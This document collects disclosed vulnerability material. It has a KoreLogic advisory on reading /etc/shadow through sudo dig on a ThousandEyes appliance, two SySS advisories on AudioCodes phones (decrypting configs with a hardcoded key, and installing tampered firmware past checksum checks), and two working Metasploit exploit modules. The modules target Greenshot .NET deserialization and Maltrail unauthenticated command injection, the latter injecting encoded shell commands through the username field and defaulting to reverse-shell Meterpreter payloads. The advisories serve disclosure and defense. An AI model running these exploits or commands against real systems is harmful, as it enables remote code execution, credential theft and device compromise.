<pre><code>KL-001-2023-001: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Read via sudo dig<br /><br />Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Read via sudo dig<br />Advisory ID: KL-001-2023-001<br />Publication Date: 2023.08.17<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-001.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: ThousandEyes<br /> Affected Product: ThousandEyes Enterprise Agent Virtual Appliance<br /> Affected Version: thousandeyes-va-64-18.04 0.218<br /> Platform: Linux / Ubuntu 18.04<br /> CWE Classification: CWE-1395: Dependency on Vulnerable<br /> Third-Party Component,<br /> CWE-1220: Insufficient Granularity of<br /> Access Control<br /> CVE ID: CVE-2023-20217<br /><br /><br />2. Vulnerability Description<br /><br /> An insecure sudo configuration permits a low-privilege user<br /> to read root-only files via the 'dig' command without a<br /> password.<br /><br /><br />3. Technical Description<br /><br /> The ThousandEyes Virtual Appliance is distributed with a<br /> restrictive set of commands that can be executed via sudo,<br /> without having to provide the password for the 'thousandeyes'<br /> account. However, the ability to execute dig via sudo,<br /> allows for reading of arbitrary files using dig's "batch"<br /> mode. This mode allows a user to specify a file of requests,<br /> one per line. The dig command will read the file with elevated<br /> privileges and display the resulting queries (i.e. file<br /> contents) back to the user.<br /><br /> thousandeyes@thousandeyes-va:~$ id<br /> uid=1000(thousandeyes) gid=1000(thousandeyes) <br />groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)<br /> thousandeyes@thousandeyes-va:~$ sudo -l<br /> Matching Defaults entries for thousandeyes on thousandeyes-va:<br /> env_reset, mail_badpass, <br />secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin<br /><br /> User thousandeyes may run the following commands on thousandeyes-va:<br /> (ALL : ALL) ALL<br /> (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, <br />/bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop<br /> te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start <br />te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart<br /> te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, <br />/usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,<br /> /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, <br />/usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install<br /> te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, <br />/usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*<br /> (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump<br /><br /> Here we see that dig is available as root with no password,<br /> and no restrictions on the arguments it can be passed.<br /><br /> thousandeyes@thousandeyes-va:~$ sudo /usr/bin/dig -f /etc/shadow<br /><br /> ; <<>> DiG 9.11.3-1ubuntu1.17-Ubuntu <<>> root:!:19145:0:99999:7:::<br /> ;; global options: +cmd<br /> ;; Got answer:<br /> ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 40036<br /> ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1<br /><br /> ;; OPT PSEUDOSECTION:<br /> ; EDNS: version: 0, flags:; udp: 65494<br /> ;; QUESTION SECTION:<br /> ;root:!:19145:0:99999:7:::. IN A<br /><br /> ;; Query time: 0 msec<br /> ;; SERVER: 127.0.0.53#53(127.0.0.53)<br /> ;; WHEN: Fri Mar 31 08:00:38 UTC 2023<br /> ;; MSG SIZE rcvd: 54<br /><br /> ; <<>> DiG 9.11.3-1ubuntu1.17-Ubuntu <<>> daemon:!*:18885:0:99999:7:::<br /> ;; Got answer:<br /> ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 32743<br /> ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1<br /><br /> ;; OPT PSEUDOSECTION:<br /> ; EDNS: version: 0, flags:; udp: 65494<br /> ;; QUESTION SECTION:<br /> ;daemon:!*:18885:0:99999:7:::. IN A<br /> ...<br />;thousandeyes:$6$qvB7Zfsh1fFCuBM9$l3X3Gj/7v.IY54N5YMFj5hpd.Fb...<br /> ...<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> The vendor has released a version which remediates the described<br /> vulnerability. Release notes are available at:<br /><br />https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-te-va-priv-esc-PUdgrx8E<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jim Becher and Hank<br /> Leininger of KoreLogic, Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2023.04.26 - KoreLogic submits vulnerability details to Cisco.<br /> 2023.04.26 - Cisco acknowledges receipt and the intention to<br /> investigate.<br /> 2023.05.04 - Cisco notifies KoreLogic that a remediation for this<br /> vulnerability is expected to be available within<br /> 90 days.<br /> 2023.06.30 - 45 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2023.07.11 - Cisco informs KoreLogic that the issue has been<br /> remediated in the latest ThousandEyes Virtual<br /> Appliance and a public advisory will be released<br /> 2023.08.16.<br /> 2023.07.24 - 60 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2023.08.09 - Cisco provides KoreLogic with CVE-2023-20217 to<br /> track this vulnerability.<br /> 2023.08.16 - Cisco public acknowledgement.<br /> 2023.08.17 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> See 3. Technical Description.<br /><br /><br />The contents of this advisory are copyright(c) 2023<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /> include Msf::Post::File<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Greenshot .NET Deserialization Fileformat Exploit',<br /> 'Description' => %q{<br /> There exists a .NET deserialization vulnerability in Greenshot version 1.3.274<br /> and below. The deserialization allows the execution of commands when a user opens<br /> a Greenshot file. The commands execute under the same permissions as the Greenshot<br /> service. Typically, is the logged in user.<br /> },<br /> 'DisclosureDate' => '2023-07-26',<br /> 'Author' => [<br /> 'p4r4bellum', # Discovery<br /> 'bwatters-r7', # msf exploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-34634'],<br /> ['EDB', '51633']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [ 'Windows', {} ],<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptPath.new('PNG_FILE', [false, 'PNG file to use'])<br /> ])<br /> end<br /><br /> def exploit<br /> if datastore['PNG_FILE'].blank?<br /> image_file = File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png')<br /> else<br /> image_file = datastore['PNG_FILE']<br /> end<br /><br /> datastore['FILENAME'] = Rex::Text.rand_text_alpha(rand(6..13)) if datastore['FILENAME'].blank?<br /> if datastore['FILENAME'].length < 10 || datastore['FILENAME'][-10, -1] != '.greenshot'<br /> datastore['FILENAME'] << '.greenshot'<br /> end<br /> cmd = payload.encoded<br /><br /> image_data = File.binread(image_file)<br /><br /> deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate(<br /> cmd,<br /> gadget_chain: :WindowsIdentity,<br /> formatter: :BinaryFormatter<br /> )<br /><br /> payload_length = deserialize_cmd.length<br /> outfile = image_data<br /> outfile << deserialize_cmd<br /> outfile << [payload_length].pack('Q')<br /> outfile << 'Greenshot01.02'<br /> file_create(outfile)<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Maltrail Unauthenticated Command Injection',<br /> 'Description' => %q{<br /> Maltrail is a malicious traffic detection system, utilizing publicly<br /> available blacklists containing malicious and/or generally suspicious trails.<br /> The Maltrail versions < 0.54 is suffering from a command injection vulnerability.<br /> The `subprocess.check_output` function in `mailtrail/core/http.py` contains<br /> a command injection vulnerability in the `params.get("username")` parameter.<br /> An attacker can exploit this vulnerability by injecting arbitrary OS commands<br /> into the username parameter. The injected commands will be executed with the<br /> privileges of the running process. This vulnerability can be exploited remotely<br /> without authentication.<br /><br /> Successfully tested against Maltrail versions 0.52 and 0.53.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Ege BALCI <egebalci[at]pm.me>', # msf module<br /> 'Chris Wild', # original PoC, analysis<br /> ],<br /> 'References' => [<br /> ['EDB', '51676'],<br /> ['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],<br /> ['URL', 'https://github.com/stamparm/maltrail/issues/19146']<br /> ],<br /> 'Platform' => ['unix', 'linux'],<br /> 'Privileged' => false,<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => :wget,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DisclosureDate' => '2023-07-31',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => []<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> Opt::RPORT(8338),<br /> OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => 'GET'<br /> )<br /> return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /> return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\(v<b>([0-9.]+)</b>\)}<br /><br /> if version < Rex::Version.new('0.54')<br /> return CheckCode::Appears("Version Detected: #{version}")<br /> end<br /><br /> CheckCode::Safe("Version Detected: #{version}")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> send_request_raw( # This needs to be a raw requess cuz we don't wanna URL encode the body<br /> 'uri' => normalize_uri(target_uri.path, 'login'),<br /> 'method' => 'POST',<br /> 'headers' => {<br /> 'ctype' => 'application/x-www-form-urlencoded'<br /> },<br /> 'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`" # We also need all the +<br /> )<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :unix_cmd<br /> print_status("Executing #{target.name}...")<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> print_status("Executing #{target.name}...")<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2022-054<br />Product: AudioCodes VoIP Phones<br />Manufacturer: AudioCodes Ltd.<br />Affected Version(s): Firmware Versions >= 3.4.8.M4<br />Tested Version(s): Firmware Version 3.4.4.1000<br />Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2022-11-11<br />Solution Date: N.A.<br />Public Disclosure: 2023-08-10<br />CVE Reference: CVE-2023-22956<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />AudioCodes VoIP phones are modern desk phones which are used for the<br />operation in enterprise environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The AudioCodes 400HD series of IP phones is a range of easy-to-use,<br />feature-rich desktop devices for the service provider hosted services,<br />enterprise IP telephony and contact center markets. Based on the same<br />advanced, field-proven underlying technology as our other VoIP products,<br />AudioCodes high quality IP phones enable systems integrators and end<br />customers to build end-to-end VoIP solutions."<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The AudioCodes VoIP phones can be managed centrally, whereby configuration<br />files are provided and requested by the phones at a central location.<br />These configuration files can also be provided in encrypted form.<br />This is intended to protect sensitive information within the configuration<br />files from unauthorized access.<br /><br />Due to the use of a hardcoded cryptographic key, an attacker is able to<br />decrypt encrypted configuration files and retrieve sensitive information.<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />By analyzing the ELF executable "decryption_tool" of an AudioCodes IP phone<br />firmware in a disassembler and decompiler, e.g. Ghidra, the encryption<br />mechanism could be reversed and the hardcoded cryptographic key could be<br />extracted.<br /><br />Used encryption algorithm: Triple DES in CBC mode<br />Memory address of the 64-byte secret for OpenSSL key and IV derivation: 00001e8f<br /><br />Extracting the secret:<br /> #> offset=$(python3 -c 'print(int("00001e8f", base=16))')<br /> #> dd skip=$offset count=64 if=decryption_tool of=secret.bin bs=1<br /><br />Deriving the key and IV from the 64-byte secret:<br /> #> openssl enc -des-ede3-cbc -P -pass pass:h4dArat[...] -nosalt<br /> <br /> key = 40DA61FB4831FF53[...]<br /> iv = C614B77A[..]<br /><br />With the derived key and IV, it is possible to decrypt encrypted configuration<br />files.<br /><br />As a proof of concept, the OpenSSL command-line tool can be used for<br />decryption:<br /> #> openssl enc -d -des-ede3-cbc -pass pass:h4dArat[...] -nosalt \<br /> -in /tmp/encrypted_config.cfg -out /tmp/plain_config.cfg<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Update devices to firmware version 3.4.8.M4 and define an individual and<br />strong secret from which the encryption key is derived.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-11-03: Vulnerability discovered<br />2022-11-11: Vulnerability reported to manufacturer<br />2022-12-12: Vulnerability confirmed by AudioCodes Ltd.<br />2023-01-19: AudioCodes Ltd. adapts the documentation so that it no<br /> longer states that the passwords are encrypted but obfuscated<br />2023-07-13: AudioCodes Ltd. informs that the upcoming release 3.4.8.M4<br /> will include a feature that allows setting a custom password<br /> from which the key will be derived<br />2023-08-10: Public disclosure at BlackHat USA[4]<br />2023-08-11: Public disclosure athttps://blog.syss.com[5]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] AudioCodes IP Phones Product Website<br /> https://www.audiocodes.com/solutions-products/products/ip-phones<br />[2] SySS Security Advisory SYSS-2022-054<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-054.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] BlackHat USA Briefings Session<br /> https://www.blackhat.com/us-23/briefings/schedule/#zero-touch-pwn-abusing-zooms-zero-touch-provisioning-for-remote-attacks-on-desk-phones-31341<br />[5] Detailed Blog Post<br /> https://blog.syss.com/posts/zero-touch-pwn/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br />E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmS30X4ACgkQrgyb+PE0<br />i1O6EQ//fO27JxW5z0SwoMTfeW/ciyFskSLhAC3fK3NFGKO6fdvGiZR0wrY6ar4E<br />VxSpYp2QIqxrr5SDGJlm3DBTzsRT7aQPz/kQn7YvB78MsMf7aMxd7Z1cGyuI5qb4<br />YElvIPtRnkcgovNoVeoxqgUVIFxI6xFSYXmU1camUpjO7wq5R8aH7uhJsbdbvQBE<br />xlObEWNOzafpo0zwyvc3GjinzZSsmVw9uIGeJyZprBctW4HKos1ReI9/0+UPmXuW<br />dafHOPtuuRaE4g+pLsUhVxEO+XcAnjEd1ZwhWIJpYgGMNyceN4muHDToxPwNLZh2<br />QJQHKr3JguxSpsS1Kp16WJawY7YIfkA7tBRmlIv/Oil/XhcJF7efgAwVZLD6vEpN<br />ZFU/kQTdy8TOnPQue40qB4WVmhq5YvffsVrP97rjhNHRA0Pk9ytxruMr0p09blJ6<br />5vhAss7cOaFZlFJFs7OGRLe/jpc1blySBUYsLjnm+OZ2rLWbe0R9VFYMsovzUu1W<br />4HxlXZo41yN/VKPUNvMA4tGZ8+dXLBx+p5x0KKossp+ZWkOFwG9+tqK2ZOsagMV6<br />Y5XZb66xK8a5R6N0dgbpOpIsvV+lpQJPMFY2sfsK8n1k/b7b5uoxLKbH/AflPWRD<br />dvKvVKkrUvxx2NHtVM4EdFcrsnE6b/s+1H7X6bXzD5KkeW6vIkc=<br />=Mo8G<br />-----END PGP SIGNATURE-----<br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2022-055<br />Product: AudioCodes VoIP Phones<br />Manufacturer: AudioCodes Ltd.<br />Affected Version(s): Firmware Versions >= 3.4.4.1000<br />Tested Version(s): Firmware Version 3.4.4.1000<br />Vulnerability Type: Missing Immutable Root of Trust in Hardware (CWE-1326)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2022-11-14<br />Solution Date: N.A.<br />Public Disclosure: 2023-08-10<br />CVE Reference: CVE-2023-22955<br />Authors of Advisory: Matthias Deeg, SySS GmbH<br /> Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />AudioCodes VoIP phones are modern desk phones which are used for the<br />operation in enterprise environments.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"The AudioCodes 400HD series of IP phones is a range of easy-to-use,<br />feature-rich desktop devices for the service provider hosted services,<br />enterprise IP telephony and contact center markets. Based on the same<br />advanced, field-proven underlying technology as our other VoIP products,<br />AudioCodes high quality IP phones enable systems integrators and end<br />customers to build end-to-end VoIP solutions."<br /><br />Due to insufficient firmware validation, an attacker can store<br />malicious firmware on AudioCodes IP phones.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the firmware image and update mechanism of AudioCodes IP<br />phones, it was identified that parsing and verification of the firmware<br />image is done by the ELF executable "flasher" which is executed from<br />the script "run_ramfs_for_upgrade.sh" located at the path<br />"/home/ipphone/scripts/".<br /><br />When analyzing the software tool "flasher", SySS found out that the<br />validation of firmware images only consists of simple checksum checks for<br />different firmware components.<br /><br />Thus, by knowing how to calculate and where to store the required checksums<br />for the "flasher" tool, an attacker is able to store malicious firmware on<br />AudioCodes IP phones.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />An AudioCodes IP phone's firmware image file contains an image header<br />followed by different sections, e.g.:<br /><br /> 1. Firmware image header<br /> 2. bootloader.img<br /> 3. rootfs.ext4<br /> 4. phone.img<br /> 5. section.map<br /> 6. flasher<br /> 7. release<br /> 8. end.section<br /><br />Each section starts with the 4 magic bytes "0xBB 0xBB 0xBB 0xBB"<br />followed by a 4-byte section header size field ("0x60 0x00 0x00 x00")<br />and other metadata like length fields and a checksum at the offset<br />0x50. This checksum is calculated by adding up all bytes of the section<br />data starting at the section offset 0x60.<br /><br />As a proof of concept, a manipulated firmware image file was created in<br />which an additional user with root privileges was added in the<br />"rootfs.ext4" section. After recalculating the checksum and updating<br />the section header with its checksum, the manipulated firmware image<br />could be successfully uploaded and installed on an AudioCodes IP phone.<br /><br />To automate this task, a simple Python script has been developed to<br />deal with AudioCodes IP phone firmware images.<br /><br />The following output exemplarily shows how a modified firmware image<br />for the AudioCodes IP phone C450HD was updated with correct checksums:<br /><br />#> python3 audiocodes-firmware-tool.py -i AudioCodes_UCC450HD_3.4.6.604.1.img -u<br /><br />AudioCodes Firmware Tool v0.3 by Matthias Deeg - SySS GmbH (c) 2022<br />- ---<br />Image infos<br />===========<br />Hardware: C450HD<br />Software: UC_3.4.6.604.1<br />Version: 25 (0x19)<br />Number of sections: 4<br />Header length: 112 (0x70)<br />Checksum: 0x00000877<br />Calculated checksum: 0x00000877<br />Attribute: 7 (0x00000007)<br />Date: 2021-12-13_09:07:38<br />CE5: 0<br />- ---<br />Section name: bootloader.img<br />Section checksum: 0x0247D1A3<br />Calculated checksum: 0x0247D1A3<br />Data size (8-byte aligned): 423992 (0x67838)<br />Data size : 423992 (0x67838)<br />- ---<br />Section name: rootfs.ext4<br />Section checksum: 0x78EF3E3D<br />Calculated checksum: 0x78EF3E6D<br />Data size (8-byte aligned): 134238208 (0x8005000)<br />Data size : 134238208 (0x8005000)<br />- ---<br />[...]<br /><br />[*] Saved updated firmware image to AudioCodes_UCC450HD_3.4.6.604.1.img.new<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Not yet fixed.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-11-10: Vulnerability discovered<br />2022-11-14: Vulnerability reported to manufacturer<br />2022-12-12: Vulnerability confirmed by AudioCodes Ltd.<br />2023-01-19: AudioCodes Ltd. informs that a solution is planned in 2023<br />2023-07-13: AudioCodes Ltd. sets solution date to the end of 2023<br />2023-08-10: Public disclosure at BlackHat USA[4]<br />2023-08-11: Public disclosure athttps://blog.syss.com[5]<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] AudioCodes IP Phones Product Website<br /> https://www.audiocodes.com/solutions-products/products/ip-phones<br />[2] SySS Security Advisory SYSS-2022-055<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-055.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] BlackHat USA Briefings Session<br /> https://www.blackhat.com/us-23/briefings/schedule/#zero-touch-pwn-abusing-zooms-zero-touch-provisioning-for-remote-attacks-on-desk-phones-31341<br />[5] Detailed Blog Post<br /> https://blog.syss.com/posts/zero-touch-pwn/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Matthias Deeg and Moritz Abrell<br />of SySS GmbH.<br /><br />E-Mail:matthias.deeg@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc<br />Key Fingerprint: D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB<br /><br />E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL:http://creativecommons.org/licenses/by/3.0/deed.en<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmS30ZUACgkQrgyb+PE0<br />i1NVOxAAsQxeEAuUDwJYIx9/dmnE8TOyl+f9VKtxO7OMSCtsFcbhFTKQD1jm1lMl<br />DKd0HAhWNWi5r87cf4tAUy8QD8NKrXCZljdUE93ZRmwWZHNmuTiyjCHzTHFr/qLG<br />rcfjiaSZawaeaSUE8LSFrZhXiYoWe+ZHsebnm96/DkMryCJ6txbXFKQlKY/MtKSb<br />iinmG6bcWGrlTJXO91OROnpmMioVDIW8YeGaoh87oaLlAsHTCBaKJgdndo3hi5QA<br />2k0aRsbunJ2UyBAKA2OPwNO+FoHJ4mBvu9b+HZYEUyhtqZ898pjxJg52C7lXfcui<br />wpb4Chh7thVhvjogMnchV1BUSRxbigoeYHywp54YxLTX336wuu0mLYjdalnB0Abx<br />ejiz0ShqznYCkiKfsj+D7kh7DE+uwX5kVQGREFwu0gnJBQsibYgUCUplCM4Ybov7<br />gHmz1QwRg0pZ4OZLw3bzZeVcXQ/PrCUGDPpILg6IVW5o6bweAnpMsa5v3HhWtN7V<br />LYGq9FlhhejuCajfYW4NbURCBjNfaC1Bb3xEIEM0bPDZMIgl8uK8UZKtNazSYkgM<br />LXo4psv8CwNnUVV1vnw76xvacn6B+UwpiTLNiNCuhuVcBXPp3j9VwiwzWjrsotL4<br />Gl6ukPl08qS8Z1tGTBtTeWT5qJ1M+ne/9eQtzxgWH2Y3kBwko+U=<br />=wsHl<br />-----END PGP SIGNATURE-----<br /></code></pre>
